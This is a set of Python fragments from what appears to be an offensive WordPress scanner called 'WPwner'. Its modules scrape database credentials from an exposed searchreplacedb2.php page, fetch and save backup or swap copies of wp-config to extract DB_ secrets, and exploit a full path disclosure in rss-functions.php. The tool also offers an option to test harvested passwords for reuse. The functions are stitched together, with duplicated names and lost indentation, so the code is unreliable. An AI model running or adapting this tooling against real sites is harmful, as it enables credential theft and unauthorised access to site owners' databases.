def passive(target):
url = target.url
url += "searchreplacedb2.php"
c = Convention()
html = ""
retvalue = []
found,html = Core.get_web_page(url,search="<title>Search and replace DB.</title>")
if found:
log.success('Search&Replace is at \x1B[31m'+url+"\x1B[0m")
url += "?step=2"
values = {'loadwp':1}
found,html = Core.get_web_page(url,values=values)
if found:
html = html.split('\n')
for line in html:
if line.find('name="host"') != -1:
retvalue.append((c.DB_Host,line.split('"')[9]))
if line.find('name="data"') != -1:
retvalue.append((c.DB_Name,line.split('"')[9]))
if line.find('name="user"') != -1:
retvalue.append((c.DB_User,line.split('"')[9]))
if line.find('name="pass"') != -1:
retvalue.append((c.DB_Password,line.split('"')[9]))
retvalue.append((c.sdb2,"True"))
return retvalue
def describe(target): tree = Core.target_description(target) root = tree.getroot() for child in root: log.info(child.tag+" : "+child.text) return []
def request_worker(url):
global swap_found
status,content = Core.get_web_page(url)
if status:
if len(content) > 0:
directory = os.getcwd()+"/output"
if not os.path.exists(directory):
os.makedirs(directory)
file_name = url.replace('/','_')
log.success("[Swap] Found backup or swap and saving it as \x1B[92m"+directory+'/'+file_name+"\x1B[0m")
f = open(directory+'/'+file_name,'w')
f.write(content)
f.close()
if "DB_" in content:
parsed = Core.parse_config_file(content)
for item in parsed:
swap_found.append(item)
def main():
global autoCross
parser = optparse.OptionParser("Usage: "+sys.argv[0]+" <options> [-u url | -f file]")
parser.add_option('-u',dest='url',type='string',help="The target's URL")
parser.add_option('-f',dest='file_name',type='string',help="XML file with the target's info")
parser.add_option('-c',dest='config_file',type='string',help="Local copy of the wp-config.php")
parser.add_option('-m',dest='method', type='string', help="The method used -> active || passive")
parser.add_option('-l',action="store_true",dest='listModules', help="List modules and description")
parser.add_option('-a',action="store_true",dest='autoCrossPass',help="Automatically cross verify password reuse")
(options, args) = parser.parse_args()
# User used -l to list modules
if options.listModules:
listModules()
return 0
# User activated -a cross verify
if options.autoCrossPass:
autoCross = True
# Will use a live host as the target
if options.url:
domain = options.url
if options.method:
if options.method != "passive" and options.method != "active":
log.info("No or wrong method provided, using passive")
else:
method = options.method
else:
method = "passive"
if options.config_file:
pwner = WPwner(method,url=domain,config=options.config_file)
else:
pwner = WPwner(method,url=domain)
# Will use an XML generated by WPwner
elif options.file_name:
target_tuplist = Core.load_target(options.file_name)
if options.config_file:
pwner = WPwner("passive",target=target_tuplist,config=options.config_file)
else:
pwner = WPwner("passive",target=target_tuplist)
else:
print parser.usage
return 0
def passive(target):
url = target.url
c = Convention()
retValue = []
url += "/wp-includes/rss-functions.php"
html = ""
found,html = Core.get_web_page(url)
if found:
log.info('[RSS Full Path] May have found Full Path Disclosure')
html = html.split('\n')
for line in html:
if line.find('() in <b>') != -1:
beg = line.find('() in <b>')+9
end = line.find("wp-includes")
retValue.append((c.Full_Path,line[beg:end]))
if len(retValue) == 0:
retValue = [('none',False)]
return retValue
def passive(target):
url = target.url
c = Convention()
url+="readme.html"
version = False
html = ""
found,html = Core.get_web_page(url,search='<br /> Version')
if found:
html = html.split('\n')
for line in html:
p = line.find('<br /> Version')
if p != -1:
versionLine = line.split('\x20')
version = versionLine[len(versionLine)-1]
if not version:
log.failure("[Version] Wasn't able to read "+url)
else:
return [(c.WP_Version,version)]
return []
def quit(self,target=None): Core.save_target(target) exit(0)
def hostUp(self): status,home = Core.get_web_page(self.target.url) return status
def load_config(self,config): f = open(config) content = f.read() f.close() return Core.parse_config_file(content)
